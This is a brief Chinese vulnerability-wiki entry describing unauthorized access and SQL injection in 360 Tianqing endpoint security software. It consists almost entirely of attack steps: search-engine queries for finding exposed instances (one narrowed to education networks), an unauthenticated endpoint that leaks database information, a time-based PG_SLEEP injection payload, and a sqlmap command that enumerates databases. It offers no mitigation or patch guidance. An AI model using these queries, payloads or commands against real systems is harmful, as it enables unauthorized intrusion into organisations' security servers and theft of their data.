360天擎未授权与sql注入 - SecNN-Wiki漏洞库管理系统&网络安全知识库-本Wiki所有信息来源于公开漏洞数据库

360天擎 - 未授权与sql注入¶

title="360新天擎"

web.title="360新天擎"&& ip.isp="教育"

路由后拼接/api/dbstat/gettablessize

比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1